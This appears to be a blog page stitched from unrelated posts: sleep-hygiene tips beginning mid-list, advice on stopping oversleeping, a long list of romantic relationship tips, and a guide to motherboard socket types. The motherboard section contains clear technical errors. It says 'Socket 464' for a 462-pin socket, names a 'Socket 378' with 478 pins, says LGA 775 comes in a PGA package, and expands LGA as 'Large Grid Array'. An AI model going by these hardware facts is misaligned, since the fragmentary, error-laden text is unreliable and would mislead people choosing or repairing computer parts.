    Abstain from smoking, drinking alcohol or ingesting caffeine because they can keep you up at night. Even though alcohol makes you sleepy, it obstructs the quality of your sleep.
  5. 5
    Exercise regularly so that your body will be tired, but do not exercise for 3 to 4 hours before you go to sleep, because it may energize you.
  6. 6
    Refrain from eating heavy meals for dinner, which can make you feel uncomfortable and will prevent you from sleeping well.
  7. 7
    Create a bedroom that is quiet, dark and a comfortable temperature, which will promote sleep and avoid disturbances.
  8. 8
    Sleep on your side with your head slightly elevated to prevent the symptoms of sleep apnea.
  9. 9
    Construct a bedtime routine such as reading, meditating or bathing. Having a routine will train your body to recognize that you are preparing for sleep, which will help you to fall asleep easier.
  10. 10
    Use your bedroom for sleep only. Do not work or do any other tasks in your bedroom if possible. If your bedroom is used only for sleep, then you will associate the room with sleep, which will aid in falling asleep faster and sleeping deeply.
  11. 11
    Get out of bed and engage in a non-stimulating activity, such as reading until you feel sleepy again. Sometimes lying in bed when you are not able to sleep makes it more difficult to feel sleepy.


 to sleep well, later on.
4. Tomato sauce, chili, pizza, and spicy foods. Digestive disturbances are a common source of sleep problems, but many people fail to make the connection. Acidic and spicy foods can cause reflux, heartburn, and other symptoms that interrupt sleep.
5. The nightcap. A drink or two may make you feel more relaxed after dinner, but it comes back to haunt you -- literally -- a few hours later, by preventing you from achieving deep sleep. And because alcohol both dehydrates you and makes you have to pee, it wakes you up, too. Wine is high in the stimulant tyrosine as well.

How to Stop Oversleeping:

Posted by Unknown On 0 comments



Step 1: Decide to ‘Wake Up’…
There’s no easier way to say it – Oversleeping is an escape mechanism. If you want to stop oversleeping, you’d have to figure out why some part of you chooses to stay in bed. Confront it. Then decide to deal with it, instead of running away from it by oversleeping.
Step 2: Get Motivated to Stop Oversleeping
  • Come up with at least one strong reason WHY you want to stop oversleeping. Be as specific as you can. It might help to write it down and read it to yourself daily.
  • Change your attitude toward sleep. If you “love to sleep”, you have to start thinking about sleep as something you must do in order to survive. Nothing more.
  • Stop making excuses like – “I need more sleep than the average person”. You should be convinced that you can sleep less and have more energy than you have now, which is most likely true.
Step 3: Commit to a Steady Sleep Schedule
It’s best if you can go to sleep and wake up at the same times every day. At least do you best to wake up at the same time, no matter how long you had slept…
Put the clock away from bed, set a wake up call, ask someone to throw you out of bed, whatever you need to do to make sure you wake up on time.
Step 4: Improve your sleep
There are many simple things you can do to get high quality sleep, which will allow you to get more energy from less sleep.
Step 5: Reduce sleep gradually
  • If you sleep 10 hours every night, don’t move to 7 hours all at once. Reduce 30-60 minutes every week or so.
  • Don’t beat yourself up when you fail, because it might only make things worse. Just learn from your mistakes and come up with a plan for the next day.
Step 6: Raise your physical and mental energy
Start working on changing your habits, lifestyle and mindset – eat well, exercise, think more positively and so on… (Visit my Energy & Motivation blog for more on that.)


- Let her know she's important     When you break her heart-[ the pain never really goes away ]                                  When she runs up at you crying, the first thing you say is:  Who's ass am I kicking today baby?                            When she stare's at your mouth-[ Kiss her ]              - When she's bored and sad, hang out with her                        - Kiss her in the pouring rain                                                                                                                                          When she doesn’t answer for a long time-[ Reassure her that everything is okay ]                                                   When she pushes you or hit's you-[ Grab her and don’t let go ]                                                                                   When she looks at you with doubt-[ Back yourself up with the truth ]                                                                          Let her wear your clothes                                                                                                                                            When she says its over-[ she still wants you to be hers ]                                                                                              When she misses you-[ shes hurting inside ]                                                                                                              When she tease's you-[ Tease her back and make her laugh ]                                                                                         When you see her at her worst-[ Tell her she's beautiful ]                                                                                         When she walks away from you mad-[ Follow her ]                                                                                                   - Call her at 12:00am on her birthday to tell her you love her                                                                                       When she say's that she like's you-[ she really does more than you could understand ]                                                      When you see her start crying-[Just hold her and don’t say a word ]                                                                 When she start's cursing at you-[ Kiss her and tell her you love her ]                                                                        When she's quiet-[ Ask her what’s wrong ]                     When she pulls away-[ Pull her back ]                                          When you see her walking-[ Sneak up and hug her waist from behind ]                                                            When she ignore's you-[ Give her your attention ]                                                                                                          When she steal's your favorite shirt-[ Let her keep it and sleep with it for a
night ]               When she lay's her head on your shoulder-[ Tilt her head up and kiss her ]                                          Watch her favorite movie with her or her favorite show even if you think its stupid                                                   When she lay's her head on your shoulder-[ Tilt her head up and kiss her ]                                                              - DON'T let her have the last word                                                     - Stay up all night with her when she's sick            - call her Hot...but Gorgeous or Beautiful is soo much better                                                                                    Argue that she is the best girl ever                                Tease her and let her tease you back                                        When she grab's at your hands-[ Hold her's and play with her fingers ]                                                                When she bump's into you-[ bump into her back and make her laugh ]                                                                              When she tells you a secret-[ keep it safe and untold ]          - Treat her like she's all that matters to you                   - Stay on the phone with her even if she’s not saying anything                                                                             - When she's mad hug her tight and don't let go                    - Call her before you sleep and after you wake up                - because 10 yrs later she'll remember you              - Say you love her more than she could ever love you             When she looks at you in your eyes-[ don’t look away until she does ]                                                              

botherboard

Posted by Unknown On 0 comments


How to use types of Motherboard

By this article you learn that how you purchase what types of Motherboard , I have given list of following useful and very good technology Motherboards as per your requirement please follow the following instructions. 

Types of Computer Motherboards
Well, of course, after the discussion that we had above, you must be wondering how to determine a motherboard type. But before starting off with this process of describing the computer motherboard type, we need to understand, what are the different ways of classifying or rather differentiating computer motherboards.

1.   Classification on the Basis of Type of Processor
This way of differentiating computer motherboards is based on motherboard socket types. In short, the CPUs that are available in the current market are compatible to specific motherboards. Let us try to understand the different CPU specific computer motherboards in a little more detail.

2.    Socket A Motherboards

These motherboards are meant for the AMD and Durons processors. The Socket A motherboard is also known as Socket 464 motherboard. The CPU socket in the motherboard has 462 pins and it comes in a PGA (Pin Grid Array) packaging. The bus speed of this type of motherboard is 100 to 200 MHz.


















3.     Socket 370 Motherboards

Meant for Intel Pentium III and Celeron processor, this motherboard comes for CPUs with 370 pins. It can also support VIA Cyrix III and VIA C3 processors. The bus speed for this type of motherboard is 66 to 133 MHz and it also comes in a PGA package.





















4.      Socket 378 Motherboards

This type of motherboard is meant for the Pentium 4 processors. It also comes in a PGA package and has 478 pins. The bus speed is 100 to 200 MHz. This motherboard can also support Intel Pentium 4EE and Intel Pentium M processor. This type of motherboard is also known as Socket N motherboard.


















5.       Socket T Motherboards

Also known as LGA 775, this type of motherboard is meant for Intel Core 2 Duo, Intel Core 2 Quad and Inel Xeon processor. Of course, this motherboard can also support other Intel processors such as the Celeron, Pentium 4, Pentium D, Celeron D and Pentium XE processor. Its specifications include 775 pins and a very high bus speed of 1600 MHz. It also comes in a PGA package.
















6.       Socket 939 Motherboards

The Socket 939 is meant mainly for the AMD family. It can support AMD processors like the Athlon 64, Athlon 64 FX, Athlon 64 X2 and Opetron. It has 939 pins and can have a bus speed from 200 to 1000 MHz. Just like the other computer motherboard types described above, it also comes in a PGA package.












7.      Socket AM3 Motherboards
Socket AM3 is among the most recently developed motherboards. Introduced in 2009, this motherboard is meant for the AMD Phenom II and AMD Athlon II processors. It has 941 pins and a bus speed range of 200 to 3200 MHz. The packaging for Socket AM3 motherboard is PGA.

















8.       Socket H Motherboards

The Socket H or LGA 1156 is another recent motherboard that has been introduced in the year 2009 and is meant for the Intel Core i3, Intel Core i5 and Intel Core i7processors. It has 1156 pins and comes in LGA (Large Grid Array) packaging.


















9.         ATX Motherboards

The ATX (Advanced Technology Extended) motherboard has a length of 12 inches and a width of 7.5 inches. The I/O ports and USB ports meant for the motherboard are integrated directly into it. The bus speed in ATX motherboard is 100 MHz. This board is mainly meant for the Intel processors.


















10.        Full AT Motherboards
This was the first type of motherboard, which was 12 inches wide and 11 inches long. This motherboard suffered from a lot of problems like access to components was cumbersome and most importantly, the heating problem.



















11.        Baby AT Motherboards
With a dimension of 10 by 8.5 inches, this motherboard is meant for the classic Pentium processors. The DIN keyboard connector at the top right corner of this motherboard makes recognizing this motherboard a relatively simple task.





















I hope you have seen and study about above motherboards are very useful, these types of Motherboard are very useful and consisting of great technology if you want to purchase any types of Motherboard please read this article with carefully.